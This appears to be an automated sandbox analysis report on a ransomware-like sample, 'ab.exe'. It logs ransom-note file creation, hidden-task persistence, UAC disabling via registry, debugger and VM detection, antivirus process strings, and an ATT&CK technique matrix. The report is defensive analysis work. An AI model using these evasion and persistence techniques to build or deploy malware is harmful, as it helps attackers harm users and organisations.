                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FBE00 OpenSCManagerW,OpenServiceW,StartServiceW,CloseServiceHandle,2_2_012FBE00
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FA970 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,CloseHandle,2_2_012FA970
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1756:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_01
                      Source: C:\Users\user\Desktop\ab.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{A86668A3-8F20-41F3-97D1-676B2AD6ADF7}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_01
                      Source: C:\Users\user\Desktop\ab.exeFile written: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
                      Source: ab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: ab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: ab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: ab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: ab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: ab.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: ab.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: ab.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: ab.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: ab.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: ab.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: ab.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0132F190 push ecx; ret 2_2_0132F1A3

                      Persistence and Installation Behavior:

                      Yara detected PersistenceViaHiddenTask
                      Source: Yara matchFile source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR
                      Creates processes via WMI
                      Source: C:\Users\user\Desktop\ab.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Desktop\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Desktop\GAOBCVIQIJ\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Desktop\LSBIHQFDVT\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Desktop\QNCYCDFIJJ\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Documents\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Documents\LSBIHQFDVT\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Downloads\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Favorites\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\Searches\uCLrcwQ_readme_.txt
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt

                      Boot Survival:

                      Yara detected PersistenceViaHiddenTask
                      Source: Yara matchFile source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FBE00 OpenSCManagerW,OpenServiceW,StartServiceW,CloseServiceHandle,2_2_012FBE00
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeAPI coverage: 8.4 %
                      Source: C:\Users\user\Desktop\ab.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0130A220 GetSystemInfo,2_2_0130A220
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0130D280 FindFirstFileW,FindNextFileW,FindClose,2_2_0130D280
                      Source: C:\Users\user\Desktop\ab.exeFile Volume queried: C:\ FullSizeInformation
                      Source: ab.exe, 00000000.00000003.274696444.00000000007F7000.00000004.00000001.sdmpBinary or memory string: ??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                      Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmpBinary or memory string: VMwareHostd,l
                      Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmpBinary or memory string: VMnetDHCPhlW
                      Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmpBinary or memory string: VMnetDHCP
                      Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmpBinary or memory string: VMwareHostdSll
                      Source: ab.exe, 00000000.00000003.313647410.0000000000828000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                      Anti Debugging:

                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FA100 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,GetCurrentThread,GetThreadContext,2_2_012FA100
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FC0AA GetProcessHeap,HeapFree,2_2_012FC0AA
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_013565AB mov eax, dword ptr fs:[00000030h]2_2_013565AB
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_013565EF mov eax, dword ptr fs:[00000030h]2_2_013565EF
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_01352C19 mov eax, dword ptr fs:[00000030h]2_2_01352C19
                      Source: C:\Users\user\Desktop\ab.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0132EAEB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0132EAEB
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0134950E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0134950E
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3 VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3 VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.png VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.docx VolumeInformation
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\EEGWXUHVUG.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\PWCCAWLGRE.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\LSBIHQFDVT.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QCFWYSKMHA.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\SQSJKEBWDT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\EFOYFBOLXA.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\EFOYFBOLXA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\BNAGMGSPLO.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\EEGWXUHVUG.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\PWCCAWLGRE.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\GAOBCVIQIJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\PALRGUCVEH.png VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\QCFWYSKMHA.jpg VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Documents\ZGGKNSUKOP.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\SQSJKEBWDT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\SUAVTZKNFL.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\SUAVTZKNFL.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\ZGGKNSUKOP.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Downloads\ZQIXMVQGAH.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Amazon.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Bing.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Facebook.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Google.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Live.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\NYTimes.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Twitter.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Wikipedia.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Favorites\Youtube.url VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Searches\Everywhere.search-ms VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\user\Searches\Indexed Locations.search-ms VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ab.exeQueries volume information: C:\Users\Public\Libraries\RecordedTV.library-ms VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_0135E284
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,2_2_0132E899
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_0135EBE5
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0135EA10
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: GetLocaleInfoW,2_2_0135628F
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: EnumSystemLocalesW,2_2_0135E526
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: EnumSystemLocalesW,2_2_0135E571
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: EnumSystemLocalesW,2_2_01355CD6
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: GetLocaleInfoA,2_2_01311F20
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: EnumSystemLocalesW,2_2_0135E60C
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: 2_2_01306180 cpuid 2_2_01306180
                      Source: C:\Users\user\Desktop\ab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: 2_2_0132F938 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_0132F938
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Code function: 2_2_0135711A _free,_free,_free,GetTimeZoneInformation,_free,2_2_0135711A

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Disables UAC (registry)
                      Source: C:\Users\user\Desktop\ab.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                      Source: ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp Binary or memory string: RTVscan.exe
                      Source: ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp Binary or memory string: Defwatch.exe

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Replication Through Removable Media 1 | Windows Management Instrumentation 11 | Windows Service 11 | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping | System Time Discovery 2 | Taint Shared Content 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 11
                      Default Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Windows Service 11 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 241 | Replication Through Removable Media 1 | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Service Execution 12 | DLL Side-Loading 1 | Process Injection 11 | Virtualization/Sandbox Evasion 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Scheduled Task/Job 1 | Access Token Manipulation 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | DLL Side-Loading 1 | Process Injection 11 | LSA Secrets | Peripheral Device Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | File and Directory Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
